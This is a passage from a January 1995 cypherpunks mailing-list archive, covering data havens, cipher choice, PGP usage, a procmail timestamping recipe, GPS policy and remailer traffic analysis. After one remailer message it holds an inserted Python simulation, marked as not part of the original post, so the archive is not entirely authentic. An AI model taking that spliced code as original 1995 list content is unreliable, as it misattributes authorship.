wouldn't want your data stored on a public access Unix system, or in 
plaintext.

> 5. I would expect to pay money for the safekeeping of my data.

you can do this a number of ways if the datahaven is turned into a data 
broker, I can pay you for good data others would be willing to 
buy (Blacknet anyone?) or you could pay me for access to data, or for safe 
secure storage and anon transfer of data to other users.

> 6. I would expect the longer you hold the data, the more it will cost.
> 7. The only thing I am counting on is the data's timely retrieval.
> 8. Welcome to the world of data "coatchecking".
> 
> Why make it more complex than this?

because it is if you want security, and also to bring in money if that is 
a motive.

> For whether it's encrypted to the nth degree, or parked in a plain brown
> wrapper in a massive unix box somewhere, as long as I the haven manager,
> return the data in a safe, timely, uncorrupted manner, I've done my duty.
>
well what would be the purpose of this data haven you propose except as an 
extra storage space for data, like if you don't have space on your own 
drive?  You're leaving out anon drop boxes, data brokering, or the data 
haven serving as a center for black markets.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 06:26:46 PST
To: craig@passport.ca
Subject: Re: Reefer madness
In-Reply-To: <m0rSIt6-0002GZC@forged.passport.ca>
Message-ID: <m0rSQc8-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: craig@passport.ca (Craig Hubley)
   Date: Thu, 12 Jan 1995 01:20:00 -0500 (EST)
   Cc: efc-talk@insight.dcss.mcmaster.ca

   Seems to me I have seen something like this cybersmut hype
   before... wasn't it called 'Reefer Madness'?

The threat is no doubt overblown, but it's not all foolishness.  My NY
State Senator is proposing to make a felony out of initiating contact
with a minor for sexual purposes.  It's illegal now, but it's only a
misdemeanor.  I spoke to Bob Penna, the legislative aide who
researched and wrote up the bill for Bill Sears.  He realizes that the
Internet cannot reasonably be censored, and that the solution is to be
able to punish people who do it (hence the felony) and to educate
parents and teachers to supervise children's online dealings (hence
the travelling road show to do just that).

No mention of "watch out if your child starts using encryption
programs" as a sign of online abuse.  Bob Penna admitted to having no
online access, so I'm sure he knows nothing about encryption.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 12 Jan 95 01:43:37 PST
To: perobich@ingr.com
Subject: Re: Storm Signals
Message-ID: <9501120943.AA03267@pero>
MIME-Version: 1.0
Content-Type: text/plain


> 
> If I were the DOD, I would set the standard GPS default to selective
> availability. After all, with SA on military receivers can still get
> fine positioning data. If someone could come up with a good reason to
> turn SA off, great, but I wouldn't leave it on otherwise.
> 
> The scenarios concerning GPS-piloted Cessnas full of nasty stuff come
> to mind, especially vis-a-vis the North Koreans. They probably don't
> have accurate IRBMs but they certainly could cobble together a
> Learjet-based delivery system.

SA is effectively cancelled out by using differential GPS
(Using a correction transmitter to send out differences
between GPS as-reported position and actual position).

However, any 'home made cruise missile' would need to
be fairly slow moving and manoeuvring. One of the features
of p-Code is support for 'high-dynamic' vehicles.

I've been away from the navigation field for some years,
so others may know more. Does the Russian Glonass system
have SA?

--
Richard Parratt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Thu, 12 Jan 95 07:49:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501120502.VAA29808@largo.remailer.net>
Message-ID: <199501121547.AA02187@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


> But selecting a single cipher is just as much a fixed policy as a
> randomly selected one is.  Far better to let the user pick a policy,
> both about sent and accepted ciphers.

If you do give the user control, what is an acceptable mechanical
implementation? Let's say I have a file encryptor which allows the
user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I
require the user to tell that program what cypher was used to encrypt
the file she wishes to decrypt?

Is storing the cypher type as part of the encrypted file a weakness?

-Paul

-- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 12 Jan 95 06:44:09 PST
To: cypherpunks@toad.com
Subject: good stuff
Message-ID: <m0rSQt8-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Interestingly enough, there are lots of interesting documents,
including anti-clipper screeds etc, on the New York State Education
Department's gopher.  Good stuff for political activists (as opposed
to passivists :).

gopher://unix5.nysed.gov:70/11/TelecommInfo/Reading%20Room%20-%20Points%20of%20View

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin.rock@njackn.com
Date: Thu, 12 Jan 95 08:32:00 PST
To: cypherpunks@toad.com
Subject: Pgp where?
Message-ID: <9501120952.0DVJZ00@njackn.com>
MIME-Version: 1.0
Content-Type: text/plain



I think this is the correct board to put this message on, but since there are
no messages to read here I might be wrong.  Does anyone know where to locate
the program (algorithm) Pretty Good Protection (PGP) ?  I've read about it in
the local newspaper, in Scientific American and in the alternate news message
area.  It sounds like a good encryption scheme and I would like to explore its
possibilities.  Thanks for any assistance.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: assets@alpha.c2.org (Offshore Assets)
Date: Thu, 12 Jan 95 09:55:06 PST
To: cypherpunks@toad.com
Subject: Chain
Message-ID: <199501121752.JAA10878@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I use Hal Finney's 'Chain' a lot: it is an easy way of automatically
building a remailer chain.  But it won't PGP correctly with the Usura
and the Flame remailers because these two have e-mail addresses that 
have changed and/or are different from the addresses specified in their
public keys (Usura, for instance, is now <usura@replay.com>, but this 
is not the address given in its public key ID). 

Is there a way for me in PGP to edit and update the information contained
in the public keys of others?
I would want to add an "also known as" line for 'Chain' to spot.

   O.A.
  <assets@alpha.c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 12 Jan 95 10:04:26 PST
To: "L. Todd Masco" <cactus@seabsd.hks.net>
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501120607.BAA19021@bb.hks.net>
Message-ID: <Pine.3.89.9501120931.A15243-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


>
> >Strength is not right aspect.  Global risk is reduced, simply because
> >the aggregate cost of a breach is reduced.
 
On Thu, 12 Jan 1995, L. Todd Masco wrote:
> Isn't it?  If an attacker does not know what cipher is used and breaking
> each is computationally expensive (though not prohibitively so) doesn't
> that add extra complexity? 

The increase in strength, if each cypher was roughly equal,
is merely order n, where n is the number of cyphers.

If, as is likely, one of the cyphers required a billionfold
less power to break than the others, you have decreased
strength by an enormous factor.  

The way to increase strength is to use a cypher, such
as IDEA, which has a large key.  Key size will increase
strength by a factor of billions, not a factor of n.

Current key sizes are such that computationally expensive
attacks do not work on symmetric cyphers.  An attack has to 
be clever.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 12 Jan 95 10:09:07 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: How do I know if its encrypted?
In-Reply-To: <ab3a75370402100421a8@[132.162.201.201]>
Message-ID: <Pine.3.89.9501121007.A15243-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Jonathan Rochkind wrote:
 
> Of course, we're not just dealing with text.  So the scheme has got to be
> changed a bit so as to be able to detect unencrypted GIFs, and mu-law
> files, and as yet to be determined unknown files.  I don't know enough
> about what's being talked about to know if this entropy detecting stuff
> will generalize to non text files.

Graphics files are already compressed, so they pass the entropy 
test, but they start with a distinctive header.

The best way to stop graphics would be a volume limit per 
apparent source and per apparent destination.

To program that is a bit like hard work.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 12 Jan 95 07:25:33 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: time stamping service (again)
In-Reply-To: <Pine.SUN.3.91.950112062429.3862C-100000@eskimo.com>
Message-ID: <199501121525.KAA17530@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| Anyway, it is now running as the following procmail recipe:
| 
| :0 w
| * ^Subject: Time Stamp This Mail
| {
| PGPPASS=whateveryourpassphraseis
| :0 c w
| | (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \
| +clearsig=off) > timestamp.out
|  
| :0 a h
| | (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \
| ($SENDMAIL -t ;rm -f timestamp.lock)
| }
| 
| To use it, just send whatever you need time stamped to me with 
| the subject "time stamp this mail".
| 
| BTW, can a procmail expert explain to me why the locallockfile 
| mechanism doesn't work with this recipe?  If I use :0 w : as 
| the first line, procmail will happily ignore the locallockfile 
| flag and proceed to munge up timestamp.out, so I have to do 
| the filelocking manually.

	You need a lockfile on the :0 cw line, not on the :0 w .

:0 cw:
| pgp -fast +batchmode +force +verbose=0 +clearsig=off > timestamp.out



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Thu, 12 Jan 95 07:41:08 PST
To: cypherpunks@toad.com
Subject: Re: Pornography, What is it?
Message-ID: <199501121539.AA14480@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:29 PM 1/11/95 -0600, root wrote:

>Article XIV (1868)
>
>Sec. 1.
>
>All persons  born or naturalized in the United States, and subject to the 
>jurisdiction thereof, are citizens of the United States and of the States
>wherein they reside. No state shall make or enforce any law which shall
>abridge the privileges or immunities of citizens of the United States;
>nor shall any State deprive any person of life, liberty, or property,
>without due process of law; nor deny to any person within its jurisdiction
>the equal protection of the laws.
>
>Where in there is the protection you speak of? I see no guarantee of my 
>Constitutional rights, only of privileges and immunities as granted
>by the federal government. 

The courts have held that the term "liberty" in the XIVth Amendment includes
the liberties protected by the body of the Constitution and the other
Amendments.


DCF

- --
PGP signing encouraged by Private Idaho (for Windows Eudora) by Joel McNamara

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxVIOYVO4r4sgSPhAQHPfgP+PisOuBlvGgb96M5bjkVdIfDb2JEkb0Nb
N4Uw9FoILGtUPibEphsJbRF4GpCd8qfHJvZjP5jTCLztCwo0r/kPc4qDKYPzRpVv
EmZm2WwByOBSDqljJJAb3a7bC5b9vOEr2shr29u1apYmGl6sldvi4lTHYMjTOxI3
rUmivlpfsOc=
=kTT1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Wed, 11 Jan 95 16:01:22 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501111859.AA02457@poboy.b17c.ingr.com>
Message-ID: <Pine.SUN.3.91.950112105756.26382B-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Jan 1995, Paul Robichaux wrote:

> If I were the DOD, I would set the standard GPS default to selective
> availability. After all, with SA on military receivers can still get
> fine positioning data. If someone could come up with a good reason to
> turn SA off, great, but I wouldn't leave it on otherwise.

This gets discussed to death over on the sci.geo.satellite-nav group.
The consensus is that you don't want to advertise your intentions, but
political considerations have always overridden practicalities.

> The scenarios concerning GPS-piloted Cessnas full of nasty stuff come
> to mind, especially vis-a-vis the North Koreans. They probably don't
> have accurate IRBMs but they certainly could cobble together a
> Learjet-based delivery system.

This too gets discussed to death over on the sci.geo.satellite-nav group.
The consensus is that a car-bomb is cheaper and more reliable, and needs
nothing more than a street-directory for navigation.

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <jdwilson@gold.chem.hawaii.edu>
Date: Thu, 12 Jan 95 08:18:16 PST
To: cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm) (fwd)
Message-ID: <199501121623.LAA23964@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>From: Censored Girls Anonymous <carolb@barton.spring.com>
>To: cypherpunks@toad.com
>Subject: Re: Microsoft TrueName (tm)


>Praise Bob! The Rev. Ivan Stang's been preaching that for years!
>Long live the Slackmaster!

I wondered why one of the few registered hosts for Microsoft was called
"Bob" - now it makes sense.  (But they've got a good sized chunk of
netblks registered...)

- -NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    Also NetSurfer@sersol.com      >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxVXWioZzwIn1bdtAQFrygF+LKX95qYx46I4dr7TL5WBZd3brfu8VqcE
BDR+o9c/Vqu1XTGTNiS2Ij4JCEm/R4Dw
=CMgM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 12 Jan 95 09:13:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501121632.IAA00887@largo.remailer.net>
Message-ID: <9501121655.AA14127@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Well, it's no weaker than current systems.  PGP stores the cipher type
> in the source code: it's always IDEA.  One should allow, however, the
> cipher type to be empty alongside the data so that another tool can
> store cipher information.

Actually, a slight correction.  PGP does have an algorithm byte
for the encryption algorithm; this byte is inside the RSA block.
(It doesn't have to be RSA, either, but that's a different story).

So long as you use a public key to encrypt, you get this byte.  If
you just use PGP -c, using the current implementation, you do not
get a type byte.  Oops.

My point is that although the current implementation doesn't have
multiple encryption schemes, that doesn't mean that it can't have
them...

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Thu, 12 Jan 95 09:04:50 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <199501121709.MAA24434@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501121623.IAA00846@largo.remailer.net>,
Eric Hughes <eric@remailer.net> wrote:
>I am assuming that it's unlikely that all of the ciphers will be
>broken simultaneously.

Quick reasoning note:

For forward secrecy, it's unnecessary that the ciphers be broken
simultaneously;  just that they are broken in the span of time
between encryption and the attack.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxUnexNhgovrPB7dAQE5LwP+JYB/CW87wI8zdgaE64KHffcde/L6c7f9
nrC0AC5ljrKYgUyzDY0XFiDd5kHSp/wtwFeZeGkobihZqGnuHgh9R9wnPTgfrKM5
L+DBymQiHvT8LG+UwBCCNcRH0dDODYpvB3fJrYobvAzEfEazfuWDdYMZ/o4feBqT
r2meoZryBxE=
=8qyB
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxViPSoZzwIn1bdtAQFC4AF/aIdX8R43DwPV8sfpjzr7MBlS2dFM+kmW
MnYjcGHaSCkkyZ9XjXnJ3QWtvTFiigyF
=9w/Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Claborne, Chris" <claborne@microcosm.sandiegoca.ATTGIS.COM>
Date: Thu, 12 Jan 95 15:45:39 PST
To: "Tocher, John" <sglass@netcom.com>
Subject: San Diego CPunks Symposium
Message-ID: <2F158E27@microcosm.SanDiegoCA.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain



CPUNKS symposium  Thursday, Jan 26, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission 
Cafe & Coffee Shop" where I hope to get an update of weasel man's new 
anonymous e-mail server, "mixmaster", exchange keys, and generally shoot the 
shit.

   Don't forget to bring your public key  fingerprint.  If you can figure 
out how to get it on the back of a business card, that would be cool.

Place: The Mission Cafe & Coffee Shop
      488-9060
      3795 Mission Bl in Mission Beach.

Time:1800

Their Directions:
     8 west to Mission Beach Ingram Exit
     Take west mission bay drive
     Go right on Mission Blvd.

     On the corner of San Jose and mission blvd.
     It is located between roller coaster and garnett.
     It's kind of 40s looking building...  funky looking (their description, 
not mine)

I will be wearing a  BRIGHT PURPLE BICYCLING JACKET.  Try to be there by 
18:30 since we may move the meeting.

See you there!

Weasel man, don't forget to bring the latest info on mixmaster.
Fish man, sweep the place for bugs.
Anarchist, the FBI has already setup surveillance.
Law man, bring the logo and your e-mail address of the month :)
New guy, bring your fingerprint.

NOTE: My e-mail address, "chris.claborne@sandiegoca.attgis.com" permanently 
replaces my .ncr.com address.  Both addresses work for now but NCR address 
will eventually be killed.

     2
 -- C  --

P.S.  Tell your wife/husband you are going to a symposium.  Unless she/he
looks in the dictionary, she/he won't know that you are really going to a
drinking party!

                                           ...  __o
                                          ..   -\<,
chris.claborne@sandiegoca.attgis.com      ...(*)/(*).          CI$: 76340.2422
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Thu, 12 Jan 95 10:31:09 PST
To: cypherpunks@toad.com
Subject: Farewell for a bit
Message-ID: <199501121830.MAA09124@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


I need to work on the DH code, so I am unsubbing for a while.
Please can the cheers, all right? ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 12 Jan 95 12:56:41 PST
To: Frederic Halper <fhalper@pilot.njin.net>
Subject: Re: Reefer madness
In-Reply-To: <9501122019.AA14798@pilot.njin.net>
Message-ID: <Pine.SUN.3.91.950112124920.28789A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 12 Jan 1995, Reuben Halper (or his dad, Frederic, posing
as a kid) wrote:

> . . .
> I'm 16 years old and have been on the Internet for a little 
> more than a year and I haven't nor have I met anyone who has 
> been approached by a pedophile. . .

Ever seen a Turkish prison film, Reuben?


 S a n d y

With apologies to Peter Graves.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:01:26 PST
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: analysis of RemailerNet
Message-ID: <ab3b1da201021004aaa4@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:57 AM 01/12/95, Wei Dai wrote:
>Alice is sending mail to.  After the first day, she can
>eliminate about half of the remailer users from the list of possible
>targets, because they, like the random user above,
>received a mail even though Alice didn't send one out during the
>collection period of that batch.  Now, since Eve can eliminate
>on average half of the list every day, Bob will be the only person left on
>that list after about (log base 2 of one million) = 20 days.
>
>Suppose Alice sent out some different numbers of cover e-mail:
[...]
>               3               log base 1 of 1,000,000 = infinity!

Yeah, I think it made sense. Let me try to rephrase what you are saying in
English rather than math, to see if it's still what you are saying.
1) Attacker Eve wants to figure out who Alice is sending mail to.
2) She can weed people out by noting 'collection periods' where Alice sends
mail, but certain people don't receive any mail, and eventually arrive at
Bob.
3) If Alice sends mail out in _every_ collection period, perhaps just to the
bit bucket, this method won't work, because there won't be any periods
where Alice doesn't send mail out.

Hmmm. The basic idea here is simply that you should send out lots of cover
mail, at least one piece in every collection period, to prevent this kind
of attack. Best, a random number of cover pieces, but at least one every
collection period.  Several thoughts:
1) If Alice and Bob are both corresponding with many people, things get
more complicated.  I tried to model it similarly to the way you modeled
your simpler situation, but got confused quickly.  This would be a good
thing to look at.  Alice sends and receives mail to several people other
than Bob, and same with Bob.  I'm not sure how this changes things, if at
all.
2) In real life, it's more likely for an attacker to want to discover Alice
knowing Bob than it is for him to want to discover Bob knowing Alice.
It's Alice who is being anonymous here by using the anonymous RemailerNet,
of course. I don't think this changes things either, but it's something to
keep in mind.
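
The elimination argument in the message above, as an added simulation that is not part of the original post. It uses the rule from step 2 (drop anyone who got no mail in a period where Alice was seen sending); the probabilities, the user id BOB and the function names are assumptions made for the example.

```python
import math
import random

BOB = 0  # constructed user id standing for Alice's real correspondent


def eliminate(n_users, periods, p_real=0.5, p_background=0.5,
              cover=False, seed=1995):
    """Apply Eve's elimination rule over a number of collection periods.

    Assumed model: in each period Alice writes to Bob with probability
    p_real, and every user independently receives unrelated mail with
    probability p_background.  With cover=True Alice also sends one message
    to the bit bucket in every period, so Eve always sees her sending.

    Returns (candidates, single_at): the users Eve has not ruled out, and the
    first period after which exactly one candidate remained (None if never).
    """
    rng = random.Random(seed)
    candidates = list(range(n_users))
    single_at = None
    for period in range(1, periods + 1):
        real = rng.random() < p_real
        if not (real or cover):
            continue  # Alice silent: this rule gives Eve nothing to intersect
        # Eve drops every user who received no mail while Alice was sending.
        candidates = [
            user for user in candidates
            if (user == BOB and real) or rng.random() < p_background
        ]
        if single_at is None and len(candidates) == 1:
            single_at = period
    return set(candidates), single_at


def compare(n_users=1_000_000, periods=120):
    """Run the same traffic model with and without per-period cover mail."""
    plain, plain_at = eliminate(n_users, periods, cover=False)
    covered, _ = eliminate(n_users, periods, cover=True)
    return {
        # log2(n) periods in which Alice sends; single_at also counts the
        # periods in which she was silent, so it comes out larger.
        "predicted_sending_periods": math.log2(n_users),
        "no_cover_candidates": plain,
        "no_cover_single_at": plain_at,
        "cover_bob_still_candidate": BOB in covered,
        "cover_candidates_left": len(covered),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

Without cover mail the candidate set collapses to Bob alone; with one cover message per period the same rule throws Bob out along with everyone else, so the intersection no longer identifies him.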






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:05:56 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
Message-ID: <ab3b202302021004413b@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:35 AM 01/12/95, Russell Nelson wrote:
>misdemeanor.  I spoke to Bob Penna, the legislative aide who
>researched and wrote up the bill for Bill Sears.  He realizes that the
>Internet cannot reasonably be censored, and that the solution is to be
>able to punish people who do it (hence the felony) and to educate

I don't find that particularly reassuring. "being able to punish people who
do it," is ultimately going to have to consist of preventing non-GAK
encryption, in the minds of the Gubmint.  You can't punish them if you
can't catch them, and you can't catch them if they use strong encryption.


Well, in reality you still can catch them,  after all no one can sexually
assault anyone over the internet (yet, anyway).  Sometime they've got to do
something in person, and there's no encryption in a physical meeting, where
everyone sees your TrueFace.  But I'm not sure how much I trust the gubmint
types to take this all into account, instead of just abolishing crypto on
the typical four horsemen platform.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Thu, 12 Jan 95 10:05:39 PST
To: cypherpunks@toad.com
Subject: Re: Purpose of Data Havens
Message-ID: <199501121810.NAA25089@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal writes:
> The idea of offsite storage doesn't seem that helpful since you can just
> store the data on your own disk in encrypted form.  Maybe if encryption
> gets outlawed it would be useful, but then you can't use encryption to
> communicate with the haven.

As Eric notes elsewhere, off-site backups are useful in general in case some
physical calamity strikes your site. It seems to me that a data haven 
addresses a more aggressive threat model than this. Rather than just worrying
about the act of a hacker / nature / etc. eradicating our local copies of
data (encrypted or not), we're concerned about intelligent agents (human or
electronic) attempting to commit genocide on all instances of some data we
possess. 

Scenario: June is a test engineer at Rockwell Intl. At the lab where she works,
it is observed that some rubber O-rings being designed for the space shuttle
are liable to crack, and lose their airtight seal, when exposed to the 
extremely low temperatures of space. The project is behind, so the researchers
are instructed to proceed in spite of the problem. June encrypts the test
results and deposits them in a data haven. Then she calls her boss's boss and
offers a deal (whitemail ?). Either the part is redesigned, or she'll present
the incriminating evidence to the New York Times. Even if Rockwell sends some
goons to June's apartment while she's at work the next day, to reduce her 
laptop to solder, she still has the means to carry out her threat.

"Rikki don't lose that number - send it off in a letter to yourself"-Steely Dan

 -L. Futplex McCarthy
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxVwgSoZzwIn1bdtAQF0vwGAuLRLR9PVcj9Q8NCqNDvRf4bC5zUA4A/U
m/9tT74hoQNEBNEzw1TqZTr0ZxHtciwd
=uXUO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 12 Jan 95 10:13:28 PST
To: assets@alpha.c2.org (Offshore Assets)
Subject: Re: Chain
In-Reply-To: <199501121752.JAA10878@infinity.c2.org>
Message-ID: <9501121813.AA14895@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Is there a way for me in PGP to edit and update the information contained
> in the public keys of others?
> I would want to add an "also known as" line for 'Chain' to spot.

Sure, pgp -ke will do that for you..  It's just that the new ID will
not be certified, and PGP will consider the key invalid as far as
trust goes..

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 12 Jan 95 10:13:52 PST
To: Nesta Stubbs <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
Message-ID: <ab3b21760302100490ca@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:30 AM 01/12/95, Nesta Stubbs wrote:
>> 4. It is no concern (only idle curiosity maybe) where the data is parked.
>
>it matters a lot to me, that's the security of the data, what if your data
>is sem top secret plan to bomb the pentagon, and you are using the data
>haven to distribute to your band of anonymous terrorists, I am sure you
>wouldn't want your data stored on a public access Unix system, or in
>plaintext.

You shouldn't ever give the operator the info in plaintext. Encrypt it,
public or otherwise, and distribute the key to your Band of Merry Men.
Then it doesn't matter even if it's sitting on a public access Unix system, no
one can read it anyhow.  The main point of this kind of data haven seems to
be providing you a remote location to store your data, in an anonymous way,
so even if it does end up being found out, you can't be linked to it.  I
wouldn't trust the operator to do anything particular with the data other
than keep it safe enough so I can retrieve it later, and I'd take the
necessary precautions to account for that lack of trust. The only reason
I'd trust him to even keep it safe for me, is because of reputation market.
If he routinely loses people's data, word is going to get around. On the
other hand, if he routinely shows people's data to the FBI, no one is even
going to know about it. I don't trust him not to routinely show the data to
the FBI, or store it in public.  Use encryption.

Of course there are different purposes for data havens, which would require
more trust of the operator.  But I'm not sure how well those are ever going
to work, because I'd much rather trust my encryption than trust the
operator.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 12 Jan 95 19:49:56 PST
To: cactus@hks.net (L. Todd Masco)
Subject: Re: Crypto functions
In-Reply-To: <199501102139.QAA00961@bb.hks.net>
